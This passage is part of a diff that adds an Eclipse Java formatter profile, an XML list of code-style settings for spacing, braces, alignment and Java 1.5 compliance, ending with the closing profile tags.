+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_paren_in_method_declaration" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_paren_in_catch" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_paren_in_constructor_declaration" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_paren_in_method_invocation" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_bracket_in_array_reference" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_and_in_type_parameter" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_arguments_in_qualified_allocation_expression" value="16"/>
+<setting id="org.eclipse.jdt.core.compiler.compliance" value="1.5"/>
+<setting id="org.eclipse.jdt.core.formatter.continuation_indentation_for_array_initializer" value="2"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_between_empty_brackets_in_array_allocation_expression" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_at_in_annotation_type_declaration" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_arguments_in_allocation_expression" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_paren_in_cast" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_unary_operator" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_angle_bracket_in_parameterized_type_reference" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_brace_in_anonymous_type_declaration" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.keep_empty_array_initializer_on_one_line" value="false"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_in_empty_enum_declaration" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.keep_imple_if_on_one_line" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_constructor_declaration_parameters" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_closing_angle_bracket_in_type_parameters" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_at_end_of_file_if_missing" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_colon_in_for" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_colon_in_labeled_statement" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_superinterfaces_in_type_declaration" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_parameterized_type_reference" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_binary_expression" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.brace_position_for_enum_declaration" value="end_of_line"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_paren_in_while" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.put_empty_statement_on_new_line" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_angle_bracket_in_type_parameters" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_between_empty_parens_in_method_invocation" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_before_while_in_do_statement" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_arguments_in_enum_constant" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.comment.format_javadoc_comments" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.comment.line_length" value="100"/>
+<setting id="org.eclipse.jdt.core.formatter.blank_lines_between_import_groups" value="0"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_enum_constant_arguments" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_semicolon" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.brace_position_for_constructor_declaration" value="next_line"/>
+<setting id="org.eclipse.jdt.core.formatter.number_of_blank_lines_at_beginning_of_method_body" value="0"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_colon_in_conditional" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.indent_body_declarations_compare_to_type_header" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_paren_in_annotation_type_member_declaration" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.wrap_before_binary_operator" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.indent_body_declarations_compare_to_enum_declaration_header" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.blank_lines_between_type_declarations" value="1"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_paren_in_synchronized" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.indent_statements_compare_to_block" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_superinterfaces_in_enum_declaration" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_question_in_conditional" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_multiple_field_declarations" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_compact_if" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_for_inits" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.indent_switchstatements_compare_to_cases" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_array_initializer" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_colon_in_default" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_and_in_type_parameter" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_between_empty_parens_in_constructor_declaration" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_colon_in_assert" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.blank_lines_before_imports" value="1"/>
+<setting id="org.eclipse.jdt.core.formatter.comment.format_html" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_throws_clause_in_method_declaration" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_angle_bracket_in_type_parameters" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_bracket_in_array_allocation_expression" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_in_empty_anonymous_type_declaration" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_colon_in_conditional" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_angle_bracket_in_parameterized_type_reference" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_paren_in_for" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_postfix_operator" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.comment.format_source_code" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_paren_in_synchronized" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_allocation_expression" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_constructor_declaration_throws" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_parameters_in_method_declaration" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_brace_in_array_initializer" value="insert"/>
+<setting id="org.eclipse.jdt.core.compiler.codegen.targetPlatform" value="1.5"/>
+<setting id="org.eclipse.jdt.core.formatter.use_tabs_only_for_leading_indentations" value="false"/>
+<setting id="org.eclipse.jdt.core.formatter.comment.format_header" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.comment.format_block_comments" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_paren_in_enum_constant" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_enum_constants" value="0"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_in_empty_block" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.indent_body_declarations_compare_to_annotation_declaration_header" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_paren_in_parenthesized_expression" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_paren_in_parenthesized_expression" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_paren_in_catch" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_multiple_local_declarations" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_paren_in_switch" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_for_increments" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_paren_in_method_invocation" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_colon_in_assert" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.brace_position_for_type_declaration" value="next_line"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_brace_in_array_initializer" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_between_empty_braces_in_array_initializer" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_paren_in_method_declaration" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_semicolon_in_for" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_paren_in_catch" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_angle_bracket_in_parameterized_type_reference" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_multiple_field_declarations" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_paren_in_annotation" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_parameterized_type_reference" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_method_invocation_arguments" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.blank_lines_after_imports" value="2"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_multiple_local_declarations" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.indent_body_declarations_compare_to_enum_constant_header" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_semicolon_in_for" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.never_indent_line_comments_on_first_column" value="false"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_angle_bracket_in_type_arguments" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.never_indent_block_comments_on_first_column" value="false"/>
+<setting id="org.eclipse.jdt.core.formatter.keep_then_statement_on_same_line" value="false"/>
+</profile>
+</profiles>